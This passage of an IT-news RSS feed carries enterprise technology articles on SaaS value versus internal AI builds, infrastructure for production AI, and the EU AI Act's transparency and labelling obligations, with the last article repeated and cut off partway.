<p class="wp-block-paragraph">Think about compliant invoicing across 140 countries. That’s not a workflow someone builds in a sprint. The certifications alone take years. A single regulatory change in one jurisdiction can break an AP process for a global enterprise overnight. Customers don’t pay for that capability because it’s technically complex. They pay because they cannot afford to own the risk of getting it wrong.</p>



<p class="wp-block-paragraph">That’s the distinction that matters: AI lowers the cost of building software. It does not lower the cost of absorbing risk. The vendors who understand this are building durable businesses. The ones who don’t are quietly subsidizing their customers’ internal build programs.</p>



<p class="wp-block-paragraph">Software sells features. Platforms sell accountability.</p>



<h2 class="wp-block-heading">The prototype trap</h2>



<p class="wp-block-paragraph">The danger for enterprise buyers right now is overcorrection. Every successful prototype looks like a cost-saving opportunity. Very few survive the jump to production.</p>



<p class="wp-block-paragraph">Building a workflow with <a href="https://www.infoworld.com/article/2338115/what-is-generative-ai-artificial-intelligence-that-creates.html" data-type="link" data-id="https://www.infoworld.com/article/2338115/what-is-generative-ai-artificial-intelligence-that-creates.html">generative AI</a> is becoming straightforward. Maintaining it is not. Models evolve. Outputs drift. Governance requirements tighten. What worked cleanly in a controlled environment behaves differently at scale, and the failure mode is worse than traditional software. Rule-based automation, when it fails, fails obviously. Agents fail silently, confidently, at scale, often with a completely reasonable-sounding explanation.</p>



<p class="wp-block-paragraph">Engineering teams that take on AI-powered systems need to solve for observability, model drift, access controls, audit trails, and long-term maintenance ownership. In regulated industries, they need to demonstrate exactly how the system reached every decision. That’s not a weekend project. That’s an ongoing operational commitment that compounds over time as models change and regulatory requirements evolve.</p>



<p class="wp-block-paragraph">Before a team decides to replace an external platform with internal AI tooling, the honest question isn’t, “Can we build this?” The real question is, “Are we prepared to own this in production, for years, as the underlying models change beneath us?” Sometimes the answer is yes. Often the answer is no, and the true cost only becomes visible after the vendor contract is canceled.</p>



<h2 class="wp-block-heading">Build vs. partner: a sharper frame</h2>



<p class="wp-block-paragraph">The build vs. buy framing has always been too binary. The right question is build vs. partner.</p>



<p class="wp-block-paragraph">Partner for the capabilities where risk transfer, regulatory complexity, and domain expertise create genuine value your team cannot replicate. Build for the capabilities that actually differentiate your business from your competitors. Don’t burn your best engineers rebuilding compliant invoice processing or production-grade document extraction. Those aren’t competitive advantages. They’re table stakes, and someone else has already paid the cost, across decades, to make them reliable.</p>



<p class="wp-block-paragraph">The organizations getting this right are honest about where they create unique value. They focus development there, and partner for everything else. The ones getting it wrong are vibe-coding solutions to non-differentiating problems while their actual competitive moat goes unattended.</p>



<h2 class="wp-block-heading">The true value of software</h2>



<p class="wp-block-paragraph">We’re not watching the death of SaaS. We’re watching the end of the friction-based value proposition: the idea that software is worth renewing because integration used to be painful. That rationale is largely gone.</p>



<p class="wp-block-paragraph">What survives is software that does something customers cannot reasonably replicate internally: absorb risk, maintain regulatory compliance, deliver operational reliability at scale, and bring genuine domain expertise into a production-grade system that someone else already stress-tested for years.</p>



<p class="wp-block-paragraph">The vendors who recognize this are already repositioning around accountability, governance, and outcomes. The ones who haven’t will find the next renewal conversation noticeably harder.</p>



<p class="wp-block-paragraph">Software sells features. Platforms sell accountability. That distinction is about to separate a lot of winners from a lot of cautionary tales.</p>



<p class="wp-block-paragraph"><em>—</em></p>



<p class="wp-block-paragraph"><a href="https://www.infoworld.com/blogs/new-tech-forum"><strong><em>New Tech Forum</em></strong></a><em><strong> provides a venue for technology leaders—including vendors and other outside contributors—to explore and discuss emerging enterprise technology in unprecedented depth and breadth. The selection is subjective, based on our pick of the technologies we believe to be important and of greatest interest to InfoWorld readers. InfoWorld does not accept marketing collateral for publication and reserves the right to edit all contributed content. Send all </strong></em><em><strong>inquiries to </strong></em><a href="mailto:doug_dineley@foundryco.com"><strong><em>doug_dineley@foundryco.com</em></strong></a><em><strong>.</strong></em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The next AI bottleneck is not the model. It’s the infrastructure behind it]]></title>
<description><![CDATA[Every enterprise AI conversation seems to begin with the same question: Which model should we use?



I understand why. Models are visible. They have names, benchmarks, release notes, pricing pages and impressive demos. They are easy to compare in a leadership meeting. One model promises better r...]]></description>
<link>https://tsecurity.de/de/3683109/it-nachrichten/the-next-ai-bottleneck-is-not-the-model-its-the-infrastructure-behind-it/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683109/it-nachrichten/the-next-ai-bottleneck-is-not-the-model-its-the-infrastructure-behind-it/</guid>
<pubDate>Tue, 21 Jul 2026 11:03:50 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Every enterprise AI conversation seems to begin with the same question: Which model should we use?</p>



<p class="wp-block-paragraph">I understand why. Models are visible. They have names, benchmarks, release notes, pricing pages and impressive demos. They are easy to compare in a leadership meeting. One model promises better reasoning. Another offers a larger context window. Another appears faster, cheaper or more specialized.</p>



<p class="wp-block-paragraph">But after years of working around enterprise platforms, integration layers, cloud migration, middleware, production operations and mission-critical systems, I see the AI conversation differently.</p>



<p class="wp-block-paragraph">The model matters. But it is not where most enterprises will struggle next.</p>



<p class="wp-block-paragraph">The next AI bottleneck is the infrastructure behind the model.</p>



<p class="wp-block-paragraph">I do not mean only GPUs, cloud capacity or data storage. I mean the full enterprise operating layer that allows AI to work safely in the real world: data pipelines, identity, APIs, messaging, observability, security controls, deployment automation, cost governance, auditability, support ownership and recovery design.</p>



<p class="wp-block-paragraph">That layer is what determines whether AI remains an exciting experiment or becomes a trusted business capability.</p>



<h2 class="wp-block-heading">Pilots hide the hard part</h2>



<p class="wp-block-paragraph">Most organizations can build an <a href="https://www.cio.com/article/4159287/most-companies-are-stuck-on-ai-chat.html">impressive AI pilot</a>. A small team can connect a model to a dataset, create a workflow and show a use case that works well in a controlled setting.</p>



<p class="wp-block-paragraph">The harder part starts when that pilot moves into a <a href="https://www.cio.com/article/4161509/ai-hype-to-ai-value-escaping-the-activity-trap.html">real production process</a>.</p>



<p class="wp-block-paragraph">That is when practical questions show up. Who owns the data quality? What systems can the AI access? How do we trace which prompt, policy or retrieval flow produced a specific answer? What happens when an API slows down, a queue backs up or a downstream system is unavailable?</p>



<p class="wp-block-paragraph">To me, these are not model problems. They are infrastructure problems.</p>



<p class="wp-block-paragraph">This is where many enterprises are now headed. The first phase of AI was experimentation. The next phase is operationalization, and that is where the real gap becomes clear.</p>



<p class="wp-block-paragraph"><a href="https://www.mckinsey.com/capabilities/quantumblack/our-insights/seizing-the-agentic-ai-advantage">McKinsey</a> has made a similar point in its work on agentic AI, noting that the next phase of value depends less on isolated tools and more on redesigning workflows, operating models and enterprise execution around agents.</p>



<p class="wp-block-paragraph">AI pilots can survive on enthusiasm. Production AI requires architecture.</p>



<h2 class="wp-block-heading">AI is becoming an integration problem</h2>



<p class="wp-block-paragraph">The more I look at enterprise AI, the more it feels like an integration challenge.</p>



<p class="wp-block-paragraph">In large organizations, I have seen how messaging platforms, integration gateways, deployment pipelines, monitoring tools and cloud infrastructure can decide whether a digital capability succeeds or fails. AI will be no different. Even the strongest model will struggle if the data, middleware, identity layer and operational controls around it are weak.</p>



<p class="wp-block-paragraph">AI does not work in isolation. It needs context from systems of record, clean data from different business areas, secure access to APIs, event streams, workflows, knowledge repositories, monitoring tools and legacy systems.</p>



<p class="wp-block-paragraph">That is why the CIO question is changing.</p>



<p class="wp-block-paragraph">It is no longer just, “Which AI tool should we buy?”</p>



<p class="wp-block-paragraph">It is becoming, “Can we safely operationalize intelligence across the business?”</p>



<p class="wp-block-paragraph">This is where agentic AI matters. Autonomous AI only creates real value when the architecture around it can make its actions safe, traceable and useful.</p>



<p class="wp-block-paragraph">A model can generate an answer. Infrastructure determines whether that answer is secure, timely, explainable, governed and connected to the right workflow.</p>



<p class="wp-block-paragraph">For example, an AI assistant that summarizes customer or order information may look like a model use case. But underneath, it depends on access control, fresh data, reliable APIs, logging, encryption, monitoring and policy enforcement.</p>



<p class="wp-block-paragraph">If the answer is wrong, people may blame the model. But the real failure may have started with stale data, weak integration, poor access design, missing observability or an unreliable downstream system.</p>



<p class="wp-block-paragraph">That is why CIOs should not judge AI only by model capability. The enterprise system around the model matters just as much.</p>



<h2 class="wp-block-heading">Latency will become a trust issue</h2>



<p class="wp-block-paragraph">In traditional technology operations, latency is often treated as a performance metric. In AI-enabled workflows, latency becomes a trust issue.</p>



<p class="wp-block-paragraph">When an employee asks an AI assistant for help and the response takes too long, the employee stops using it. When a customer-facing workflow becomes slow, the customer abandons it. When an AI agent waits on multiple backend calls, the entire business process feels unreliable.</p>



<p class="wp-block-paragraph">This becomes even more important as organizations move from simple chat interfaces to agentic workflows. A single AI-driven action may include identity checks, context retrieval, policy validation, model reasoning, API calls, business-rule execution, logging and human approval.</p>



<p class="wp-block-paragraph">Each step adds latency. Each dependency adds a possible failure point.</p>



<p class="wp-block-paragraph">A model may be fast in a benchmark but slow inside an enterprise process. That difference matters.</p>



<p class="wp-block-paragraph">This is where platform engineering becomes essential. Enterprises need reusable patterns for AI workloads: approved connectors, secure retrieval methods, queue-based decoupling, caching strategies, deployment pipelines, monitoring dashboards and standard rollback procedures.</p>



<p class="wp-block-paragraph">Without those patterns, every AI initiative becomes a custom build. Custom builds may work for pilots, but they do not scale across a large enterprise.</p>



<h2 class="wp-block-heading">Observability has to expand</h2>



<p class="wp-block-paragraph">Traditional monitoring tells us whether infrastructure is healthy. Is the server up? Is CPU high? Is memory exhausted? Is the application returning errors?</p>



<p class="wp-block-paragraph">AI needs that, but it also needs more.</p>



<p class="wp-block-paragraph">We need to know what data was retrieved, which model was used, which prompt version was active, which user initiated the request, which policy was applied, how long each step took and whether the output passed validation.</p>



<p class="wp-block-paragraph">We also need to detect new forms of risk: unusual usage patterns, repeated failed tool calls, unexpected cost spikes, sensitive data exposure, weak retrieval results or an AI workflow attempting actions outside its intended boundary.</p>



<p class="wp-block-paragraph">In production AI, observability is not only about uptime. It is about confidence.</p>



<p class="wp-block-paragraph">If a business leader, auditor, regulator or security team asks why an AI system made a recommendation, the answer cannot be, “The model said so.” The enterprise needs traceability. It needs evidence. It needs operational context that engineers, risk teams and business owners can understand.</p>



<p class="wp-block-paragraph">This is one of the biggest gaps I see in AI strategy. Many organizations are investing in models and use cases, but not enough in the control plane required to manage them.</p>



<h2 class="wp-block-heading">Data readiness is still underestimated</h2>



<p class="wp-block-paragraph">AI has exposed an uncomfortable truth: many enterprises are not as data ready as they think.</p>



<p class="wp-block-paragraph">Data is often duplicated across platforms, described differently by each team, governed inconsistently and refreshed on different schedules. Access rules may be clear in one system but unclear in another. Even basic business definitions can change from department to department.</p>



<p class="wp-block-paragraph">AI does not fix that automatically. In many cases, it makes the problem more visible.</p>



<p class="wp-block-paragraph">A bad report may be questioned. A bad AI answer may sound confident enough to be trusted.</p>



<p class="wp-block-paragraph">That is a real risk.</p>



<p class="wp-block-paragraph">Being data-ready for AI is not just about connecting a vector database or indexing documents. It requires clear ownership, lineage, classification, quality checks, retention rules, access boundaries and a shared understanding of which data should be used for which purpose.</p>



<p class="wp-block-paragraph">The same principle applies to resilient cloud-native design. In my IEEE TechRxiv paper, “<a href="https://www.techrxiv.org/doi/full/10.36227/techrxiv.175433366.65304469/v1">Enabling Fault-Tolerant Multicast in Cloud-Native Architectures</a>” I explored how reliability, observability and fault tolerance become foundational requirements when critical workloads stretch across hybrid and multi-cloud environments.</p>



<p class="wp-block-paragraph">CIOs already understand this because they have lived through enterprise resource planning programs, cloud migration, integration modernization, cybersecurity transformation and analytics initiatives. The lesson is familiar: technology cannot outrun data discipline forever.</p>



<h2 class="wp-block-heading">Security cannot be added later</h2>



<p class="wp-block-paragraph">As AI moves from answering questions to acting, security becomes much more important.</p>



<p class="wp-block-paragraph">An assistant that summarizes information carries one level of risk. An agent that can open a ticket, update a record, trigger a workflow, approve a request or contact a customer carries a very different one.</p>



<p class="wp-block-paragraph">The more AI can do, the more identity, authorization, least privilege, separation of duties and human approval matter.</p>



<p class="wp-block-paragraph">Enterprises should be careful not to grant AI broad access just to speed up a pilot. That may seem harmless in development, but it can become dangerous at scale.</p>



<p class="wp-block-paragraph">AI access should be treated like any other privileged enterprise capability: limited, logged, reviewed and easy to revoke.</p>



<p class="wp-block-paragraph">The <a href="https://www.nist.gov/itl/ai-risk-management-framework">NIST</a> AI Risk Management Framework is a useful reference point here because it frames AI risk as something organizations must govern, map, measure and manage continuously rather than something handled only at the end of deployment.</p>



<p class="wp-block-paragraph">Security teams should be involved early, not at the end. The goal is not to slow innovation. The goal is to build a platform where safe innovation becomes repeatable.</p>



<h2 class="wp-block-heading">The CIO has to define the operating model</h2>



<p class="wp-block-paragraph">AI is creating pressure from every direction. Boards want productivity. Business teams want automation. Employees want better tools. Vendors are pushing new features. Security teams are watching risk. Finance teams are watching cost. Customers expect faster, smarter experiences.</p>



<p class="wp-block-paragraph">The CIO sits in the middle of all of it.</p>



<p class="wp-block-paragraph">That is why the CIO’s role cannot stop at choosing tools or approving pilots. The CIO has to define how AI will actually operate across the enterprise.</p>



<p class="wp-block-paragraph">That means answering practical questions. Which architecture is approved? Which data sources can be trusted? How are AI workflows deployed, monitored, supported and governed? How are costs controlled? How do teams reuse common patterns instead of rebuilding the same foundation each time?</p>



<p class="wp-block-paragraph">This work may not be as exciting as a model demo, but it is what separates sustainable AI from short-term experimentation.</p>



<p class="wp-block-paragraph">The winning organizations will not be the ones with the most pilots. They will be the ones with the strongest AI operating layer.</p>



<p class="wp-block-paragraph">They will build reusable platform patterns, strengthen data governance, design access properly, monitor AI behavior end to end and measure success by business improvement, not only model performance.</p>



<p class="wp-block-paragraph">The model still matters. But the enterprise behind the model matters more.</p>



<p class="wp-block-paragraph">A powerful model on weak infrastructure will eventually disappoint the business. A capable model on strong infrastructure can deliver real value because it can be trusted, secured, scaled and improved.</p>



<p class="wp-block-paragraph">That is the shift CIOs need to lead.</p>



<p class="wp-block-paragraph">The next AI bottleneck is not the model. It is whether the enterprise behind the model is ready.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The EU’s AI transparency deadline is weeks away. Is your enterprise ready?]]></title>
<description><![CDATA[Providers and deployers of AI systems: You only have a couple of weeks left until you must explicitly inform users when they are interacting with AI content.



To assist in the effort, the European Commission (Commission) has published guidelines to help AI deployers get in line with the AI Act’...]]></description>
<link>https://tsecurity.de/de/3682527/it-nachrichten/the-eus-ai-transparency-deadline-is-weeks-away-is-your-enterprise-ready/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3682527/it-nachrichten/the-eus-ai-transparency-deadline-is-weeks-away-is-your-enterprise-ready/</guid>
<pubDate>Tue, 21 Jul 2026 04:02:28 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Providers and deployers of AI systems: You only have a couple of weeks left until you must explicitly inform users when they are interacting with AI content.</p>



<p class="wp-block-paragraph">To assist in the effort, the European Commission (Commission) has published <a href="https://ec.europa.eu/commission/presscorner/detail/en/ip_26_1653" target="_blank" rel="noreferrer noopener">guidelines</a> to help AI deployers get in line with the AI Act’s transparency obligations, which will begin to go into effect on August 2.</p>



<p class="wp-block-paragraph">After that, companies providing AI systems must alert users when they are interacting with AI. They must also tell users when they have been exposed to deepfakes, “emotion recognition,” or biometric categorization systems, or when they are given AI-manipulated content in matters of “public interests without human review or editorial control.”</p>



<p class="wp-block-paragraph"><a href="https://commission.europa.eu/about/organisation/college-commissioners/henna-virkkunen_en" target="_blank" rel="noreferrer noopener">Henna Virkkunen</a>, the Commission’s executive VP for tech sovereignty, security and democracy, said in a statement, “with today’s guidelines, the Commission supports the smooth and effective application of the AI Act to make AI systems interacting with people such as chatbots and AI agents and AI content more transparent and trustworthy. These guidelines support providers and deployers in meeting their obligations under the AI Act, while helping citizens know when they are interacting with AI.”</p>



<p class="wp-block-paragraph">Systems must include machine-readable markers to reveal such content, to reduce “the risk of deception and manipulation” and build public trust in AI.</p>



<p class="wp-block-paragraph">“Generative systems have collapsed the cost of producing convincing content while the cost of judging it stands where it always stood,” said <a href="https://greyhoundresearch.com/svg/" target="_blank" rel="noreferrer noopener">Sanchit Vir Gogia</a>, chief analyst at Greyhound Research. This requirement is “an attempt to restore friction to that imbalance.”</p>



<p class="wp-block-paragraph">A company’s non-compliance could result in fines anywhere from €750K (about $856K) to €15M (about $17 million), or even up to 3% of its total worldwide annual revenue.</p>



<h2 class="wp-block-heading">Transparency requirements</h2>



<p class="wp-block-paragraph">The <a href="https://www.cio.com/article/2096040/what-it-leaders-need-to-know-about-the-eu-ai-act.html" target="_blank">EU AI Act’s</a> transparency requirements apply to “natural or legal persons,” public authorities, agencies, or other bodies that develop AI systems, or have them developed, and place them on the EU market or into use under their name or trademark. This means all companies, regardless of whether or not they are EU-based.</p>



<p class="wp-block-paragraph">“Systems placed on the European market, put into service there, or producing outputs used there are inside the field, wherever the developer sits,” Gogia noted.</p>



<p class="wp-block-paragraph">Applicable systems must be intended to interact directly with “natural persons”; these systems include AI-enabled chatbots or conversational agents, AI companions, or coding agents. However, AI-enabled tools like recommender systems, spam filters, authentication, search and retrieval, transcription, text and code auto-completion, or predictive maintenance do not fall under the rule.</p>



<p class="wp-block-paragraph">Specific outputs such as AI-generated text, images, video, and audio must contain a machine-readable mark. Deepfakes and public interest-related text created by AI without human review or control must be clearly labeled, however, deepfake content that is “artistic, creative, satirical, or fictional” is largely exempt.</p>



<p class="wp-block-paragraph">AI content must be marked with one of three labels: “AI,” “Fully AI-generated,” or “Partially AI-modified.” For instance, “Fully AI-generated” applies when news summaries, music, art, or videos have been created without any human oversight (apart from prompting), while “partially AI-modified” could mean a person’s face is swapped into an authentic photograph to create a deepfake.</p>



<p class="wp-block-paragraph">The three icons are publicly available for free use; enterprises can download zip files in <a href="https://ec.europa.eu/newsroom/dae/redirection/document/129547" target="_blank" rel="noreferrer noopener">PNG</a> and <a href="https://ec.europa.eu/newsroom/dae/redirection/document/129546" target="_blank" rel="noreferrer noopener">SVG</a> formats.</p>



<p class="wp-block-paragraph">Most of the <a href="https://www.cio.com/article/4032894/analysis-of-the-european-ai-regulation-one-year-after-its-entry-into-force.html" target="_blank">Act’s transparency rules</a> begin to go into effect on August 2. But AI systems placed on the market before then will have some leeway; they must be in compliance by December 2.</p>



<p class="wp-block-paragraph">However, a four-month allowance “on one obligation, for one population of systems, contingent on one procedural step, is not a strategy,” Gogia emphasized. Enterprises should plan to comply by August 2 and “treat any relief that arrives as margin.”</p>



<h2 class="wp-block-heading">A consistent code of practice</h2>



<p class="wp-block-paragraph">Along with the transparency guidelines, the Commission has introduced a <a href="https://digital-strategy.ec.europa.eu/en/policies/code-practice-ai-generated-content" target="_blank" rel="noreferrer noopener">code of practice</a> that essentially serves as a gesture of good faith. When signed, it can provide “legal certainty” and a “simple and practical” way to demonstrate compliance with the <a href="https://www.cio.com/article/4143748/top-global-and-us-ai-regulations-to-look-out-for.html" target="_blank">AI Act</a>, according to the Commission. Signatories can also collaborate through the ‘Signatory Taskforce,’ which will share practices and advance technologies around marking and labeling practices.</p>



<p class="wp-block-paragraph">Providers that choose not to sign must comply through other methods and demonstrate that those methods are “adequate” through assessment by surveillance authorities, according to the Commission.</p>



<p class="wp-block-paragraph">Non-signatories “keep their flexibility, and will face more case-by-case scrutiny for it,” said Gogia.</p>



<h2 class="wp-block-heading">Criteria for compliance </h2>



<p class="wp-block-paragraph"><a href="https://www.infotech.com/profiles/shashi-bellamkonda" target="_blank" rel="noreferrer noopener">Shashi Bellamkonda</a>, principal research director at Info-Tech Research Group, pointed out that the transparency requirements apply to content only when three criteria are met: It has been published, is informative to the public, or is on matters of public interest.</p>



<p class="wp-block-paragraph">B2B business content or blogs may not need an AI disclosure if they do not meet these criteria, he noted. Also, published text that has undergone human review or is under editorial control does not need to be labeled. Editorial control means that a person must hold the ultimate legal responsibility for the publication of the content.</p>



<p class="wp-block-paragraph">Many companies like Google, Adobe, and LinkedIn have already established ways to identify images marked as AI-generated. Meta has made it a requirement, but the creator has to add the AI-generated label, Bellamkonda said.</p>



<p class="wp-block-paragraph">“This is a good move for <a href="https://www.computerworld.com/article/4164963/eu-lawmakers-fail-to-agree-on-watered-down-ai-act-talks-pushed-to-may.html" target="_blank">guardrails</a> around public information, and companies with good compliance and ethical oversight may not have to worry about this,” he noted. But as a general practice, companies should disclose AI-generated content and state whether it has been human reviewed.</p>



<h2 class="wp-block-heading">Creating a transparency pipeline</h2>



<p class="wp-block-paragraph">Establishing full transparency means identifying who carries the responsibility for the content, whether the marking survives real use, not just testing, and what evidence will defend the decision, Gogia said.</p>



<p class="wp-block-paragraph">Concerns cluster around responsibility, durability and evidence. Several organizations usually touch one piece of content, and none controls the whole chain, which is why contracts become the “pressure point,” he said. Most current agreements were written to deliver software and say “almost nothing” about provenance persistence, verification access, or evidence retention.</p>



<p class="wp-block-paragraph">The durability concern is the most difficult, Gogia noted, because marking performs well in controlled settings but “badly in ordinary life.” Meta, for one, said its invisible watermark was designed to survive cropping; a published test, however, found the company’s preview detector missed <a href="https://www.reuters.com/business/meta-ai-image-detector-fails-identify-some-its-own-cropped-ai-images-reuters-2026-07-10/" target="_blank" rel="noreferrer noopener">55% of cropped images</a>.</p>



<p class="wp-block-paragraph">“CIOs should ask which platform can actually provide evidence before believing its dashboard,” said Gogia.</p>



<p class="wp-block-paragraph">Disclosure of AI use must be “clear, distinguishable and accessible,” he emphasized. “A notice buried in lengthy terms, or reachable only through determined clicking, satisfies nobody, least of all a market surveillance authority.”</p>



<p class="wp-block-paragraph">Sustained compliance is a “living control” requiring a central record of systems, duties and evidence; testing taking place where the user meets the control rather than where the developer built it; and continuous supplier assurance. Enforcement will vary by country, so keep one common baseline with local overlays, Gogia said.</p>



<p class="wp-block-paragraph">His advice: Inventory every system that talks to people, generates content, or gauges sentiment; classify provider and deployer roles; place disclosures at first interaction; define substantive human review; keep the evidence.</p>



<p class="wp-block-paragraph">Marks and provenance signals should be tested after content undergoes cropping, compression, translation, transcription, and other editing, Gogia said. A useful audit starts from a real output and follows its “pulse” through generation, editing and publication, identifying at “each beat” the responsible party, the surviving mark, and evidence for exceptions. Missed labels should also be traced for root cause and recurrence.</p>



<p class="wp-block-paragraph">To ensure compliance, before August 2, enterprises need a prioritized inventory, live disclosures on the highest-risk use cases, and a “named owner for every control,” he noted. In the first 30 days, they should stabilize and test; in the first 90 days, push requirements into procurement processes as a standing discipline. Procurement must secure commitments on marking methods, known failure modes, and evidence access, with explicit notice if/when any of them change.</p>



<p class="wp-block-paragraph">“The sensible architecture is a common transparency baseline carrying traceability, responsibility, and evidence, with jurisdictional overlays for language, sector rules, and local practice,” Gogia said.</p>



<p class="wp-block-paragraph"><em>This article originally appeared on <a href="https://www.cio.com/article/4199109/the-eus-ai-transparency-deadline-is-weeks-away-is-your-enterprise-ready.html" target="_blank">CIO.com</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The EU’s AI transparency deadline is weeks away. Is your enterprise ready?]]></title>
<description><![CDATA[Providers and deployers of AI systems: You only have a couple of weeks left until you must explicitly inform users when they are interacting with AI content.



To assist in the effort, the European Commission (Commission) has published guidelines to help AI deployers get in line with the AI Act’...]]></description>
<link>https://tsecurity.de/de/3682511/it-nachrichten/the-eus-ai-transparency-deadline-is-weeks-away-is-your-enterprise-ready/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3682511/it-nachrichten/the-eus-ai-transparency-deadline-is-weeks-away-is-your-enterprise-ready/</guid>
<pubDate>Tue, 21 Jul 2026 03:48:17 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Providers and deployers of AI systems: You only have a couple of weeks left until you must explicitly inform users when they are interacting with AI content.</p>



<p class="wp-block-paragraph">To assist in the effort, the European Commission (Commission) has published <a href="https://ec.europa.eu/commission/presscorner/detail/en/ip_26_1653" target="_blank" rel="noreferrer noopener">guidelines</a> to help AI deployers get in line with the AI Act’s transparency obligations, which will begin to go into effect on August 2.</p>



<p class="wp-block-paragraph">After that, companies providing AI systems must alert users when they are interacting with AI. They must also tell users when they have been exposed to deepfakes, “emotion recognition,” or biometric categorization systems, or when they are given AI-manipulated content in matters of “public interests without human review or editorial control.”</p>



<p class="wp-block-paragraph"><a href="https://commission.europa.eu/about/organisation/college-commissioners/henna-virkkunen_en" target="_blank" rel="noreferrer noopener">Henna Virkkunen</a>, the Commission’s executive VP for tech sovereignty, security and democracy, said in a statement, “with today’s guidelines, the Commission supports the smooth and effective application of the AI Act to make AI systems interacting with people such as chatbots and AI agents and AI content more transparent and trustworthy. These guidelines support providers and deployers in meeting their obligations under the AI Act, while helping citizens know when they are interacting with AI.”</p>



<p class="wp-block-paragraph">Systems must include machine-readable markers to reveal such content, to reduce “the risk of deception and manipulation” and build public trust in AI.</p>



<p class="wp-block-paragraph">“Generative systems have collapsed the cost of producing convincing content while the cost of judging it stands where it always stood,” said <a href="https://greyhoundresearch.com/svg/" target="_blank" rel="noreferrer noopener">Sanchit Vir Gogia</a>, chief analyst at Greyhound Research. This requirement is “an attempt to restore friction to that imbalance.”</p>



<p class="wp-block-paragraph">A company’s non-compliance could result in fines anywhere from €750K (about $856K) to €15M (about $17 million), or even up to 3% of its total worldwide annual revenue.</p>



<h2 class="wp-block-heading">Transparency requirements</h2>



<p class="wp-block-paragraph">The <a href="https://www.cio.com/article/2096040/what-it-leaders-need-to-know-about-the-eu-ai-act.html" target="_blank">EU AI Act’s</a> transparency requirements apply to “natural or legal persons,” public authorities, agencies, or other bodies that develop AI systems, or have them developed, and place them on the EU market or into use under their name or trademark. This means all companies, regardless of whether or not they are EU-based.</p>



<p class="wp-block-paragraph">“Systems placed on the European market, put into service there, or producing outputs used there are inside the field, wherever the developer sits,” Gogia noted.</p>



<p class="wp-block-paragraph">Applicable systems must be intended to interact directly with “natural persons”; these systems include AI-enabled chatbots or conversational agents, AI companions, or coding agents. However, AI-enabled tools like recommender systems, spam filters, authentication, search and retrieval, transcription, text and code auto-completion, or predictive maintenance do not fall under the rule.</p>



<p class="wp-block-paragraph">Specific outputs such as AI-generated text, images, video, and audio must contain a machine-readable mark. Deepfakes and public interest-related text created by AI without human review or control must be clearly labeled, however, deepfake content that is “artistic, creative, satirical, or fictional” is largely exempt.</p>



<p class="wp-block-paragraph">AI content must be marked with one of three labels: “AI,” “Fully AI-generated,” or “Partially AI-modified.” For instance, “Fully AI-generated” applies when news summaries, music, art, or videos have been created without any human oversight (apart from prompting), while “partially AI-modified” could mean a person’s face is swapped into an authentic photograph to create a deepfake.</p>



<p class="wp-block-paragraph">The three icons are publicly available for free use; enterprises can download zip files in <a href="https://ec.europa.eu/newsroom/dae/redirection/document/129547" target="_blank" rel="noreferrer noopener">PNG</a> and <a href="https://ec.europa.eu/newsroom/dae/redirection/document/129546" target="_blank" rel="noreferrer noopener">SVG</a> formats.</p>



<p class="wp-block-paragraph">Most of the <a href="https://www.cio.com/article/4032894/analysis-of-the-european-ai-regulation-one-year-after-its-entry-into-force.html" target="_blank">Act’s transparency rules</a> begin to go into effect on August 2. But AI systems placed on the market before then will have some leeway; they must be in compliance by December 2.</p>



<p class="wp-block-paragraph">However, a four-month allowance “on one obligation, for one population of systems, contingent on one procedural step, is not a strategy,” Gogia emphasized. Enterprises should plan to comply by August 2 and “treat any relief that arrives as margin.”</p>



<h2 class="wp-block-heading">A consistent code of practice</h2>



<p class="wp-block-paragraph">Along with the transparency guidelines, the Commission has introduced a <a href="https://digital-strategy.ec.europa.eu/en/policies/code-practice-ai-generated-content" target="_blank" rel="noreferrer noopener">code of practice</a> that essentially serves as a gesture of good faith. When signed, it can provide “legal certainty” and a “simple and practical” way to demonstrate compliance with the <a href="https://www.cio.com/article/4143748/top-global-and-us-ai-regulations-to-look-out-for.html" target="_blank">AI Act</a>, according to the Commission. Signatories can also collaborate through the ‘Signatory Taskforce,’ which will share practices and advance technologies around marking and labeling practices.</p>



<p class="wp-block-paragraph">Providers that choose not to sign must comply through other methods and demonstrate that those methods are “adequate” through assessment by surveillance authorities, according to the Commission.</p>



<p class="wp-block-paragraph">Non-signatories “keep their flexibility, and will face more case-by-case scrutiny for it,” said Gogia.</p>



<h2 class="wp-block-heading">Criteria for compliance </h2>



<p class="wp-block-paragraph"><a href="https://www.infotech.com/profiles/shashi-bellamkonda" target="_blank" rel="noreferrer noopener">Shashi Bellamkonda</a>, principal research director at Info-Tech Research Group, pointed out that the transparency requirements apply to content only when three criteria are met: It has been published, is informative to the public, or is on matters of public interest.</p>



<p class="wp-block-paragraph">B2B business content or blogs may not need an AI disclosure if they do not meet these criteria, he noted. Also, published text that has undergone human review or is under editorial control does not need to be labeled. Editorial control means that a person must hold the ultimate legal responsibility for the publication of the content.</p>



